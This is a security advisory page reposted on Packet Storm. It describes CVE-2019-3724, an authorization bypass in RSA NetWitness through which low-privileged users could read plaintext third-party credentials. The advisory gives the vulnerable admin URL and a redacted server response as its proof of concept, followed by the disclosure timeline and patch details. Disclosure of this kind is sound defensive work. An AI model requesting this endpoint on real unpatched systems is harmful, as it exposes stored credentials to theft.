what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

RSA NetWitness Authorization Bypass

RSA NetWitness Authorization Bypass
Posted May 15, 2019
Authored by Mantas Juskauskas | Site sec-consult.com

RSA NetWitness versions prior to 10.6.6.1 and 11.2.1.1 suffer from an issue where an unauthorized attacker can access an administrative resource that may contain plain text credentials to a 3rd party system.

tags | exploit
advisories | CVE-2019-3724
SHA-256 | 6d0ceca9c6f8aa7aa412ceb70a08b4ec581622d3527f094633b4cb01c6f8c21d

RSA NetWitness Authorization Bypass

Change Mirror Download
SEC Consult Vulnerability Lab Security Advisory < 20190515-0 >
=======================================================================
title: Authorization Bypass
product: RSA NetWitness
vulnerable version: <10.6.6.1, <11.2.1.1
fixed version: 10.6.6.1, 11.2.1.1
CVE number: CVE-2019-3724
impact: Medium
homepage: https://www.rsa.com
found: 2018-09-18
by: Mantas Juskauskas (Office Vilnius)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"RSA provides more than 30,000 customers around the world with the essential
security capabilities to protect their most valuable assets from cyber
threats. With RSA's award-winning products, organizations effectively detect,
investigate, and respond to advanced attacks; confirm and manage identities;
and ultimately, reduce IP theft, fraud, and cybercrime."

Source: https://www.rsa.com/en-us/company/about


Business recommendation:
------------------------
By exploiting the vulnerability documented in this advisory an unauthorized
attacker can access an administrative resource that may contain plain text
credentials to a 3rd party system.

The vendor provides a patch which should be installed on affected systems.


Vulnerability overview/description:
-----------------------------------
The authorization mechanism provided by the platform is prone to an authorization
bypass vulnerability, which can be easily exploited by authenticated (but low
privileged) remote attackers for gaining access to administrative information
including plaintext passwords.


Proof of concept:
-----------------
A logged-in low privileged user (e.g. with role Analyst) is able to access
an administrative resource by calling the following URL:

https://[host]/admin/system/whois/properties

After the above URL is accessed, the server returns the following HTTP response
that contains sensitive information to a 3rd party whois service including
plaintext passwords:

HTTP/1.1 200 OK
Server: nginx
Date: [snip]
Content-Type: application/json;charset=UTF-8
Connection: close
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Set-Cookie: [snip]
Content-Length: 795

{"success":true,"data":{"queryUrl":"https://[snip]","authUrl":"https://[snip]","userId":"[snip]","pw":"[snip]","allowedRequests":100,"allowedRequestsInterval":60,"queueMaxSize":100000,"cacheMaxSize":50000,"refreshInterval":30,"waitForHttpRequests":true,"settings":{"query-url":"https://[snip]","queue-max-size":100000,"password":"[snip]","allowed-requests":100,"auth-url":"https://[snip]","user-id":"[snip]","refresh-interval-seconds":{"seconds":2592000,"milliSeconds":2592000000},"cache-max-size":50000,"wait-for-http-request":true,"allowed-requests-interval-seconds":{"seconds":60,"milliSeconds":60000}}}}



Vulnerable / tested versions:
-----------------------------
The identified vulnerability has been verified to exist in the
RSA NetWitness platform, version 11.1.0.1.

According to the vendor, platform version 10 is also affected.

The following versions are vulnerable:
* <10.6.6.1
* <11.2.1.1


Vendor contact timeline:
------------------------
2018-10-01: Contacting vendor through PGP via secure@dell.com
2018-10-02: Vendor acknowledges the information was received, forwards
the info to the relevant department
2018-10-11: Vendor confirms the impact of the authorization issue,
starts to work on the remediation timeline
2018-10-15: Vendor provides additional information
2018-10-22: Contacting vendor to provide the remediation timeline
2018-10-23: Further email exchange related to the remediation timeline
2019-01-18: Vendor provides an update on the fix timeline
2019-03-05: Asking for a status update
2019-03-06: Vendor provides a status update on the release, patch for
platform version 11 will be released in March, version 10
Mid-April
2019-04-01: Asking for a specific release date & further status update
2019-04-01: Vendor: release is scheduled for 23rd April 2019, but may change,
they will inform us
2019-05-06: Asking for a status update; no answer
2019-05-09: Noticed that the new release is online fow a while now, asking
the vendor for a status update again
2019-05-09: Vendor: published security advisory URL and CVE
2019-05-15: SEC Consult advisory release


Solution:
---------
The following patched versions address the identified issue:
* 11.2.1.1
* 10.6.6.1

Security advisory of the vendor: https://community.rsa.com/docs/DOC-104202

The vendor specifically told us that version 11.3 is not affected by this
vulnerability.


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF M. Juskauskas / @2019

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close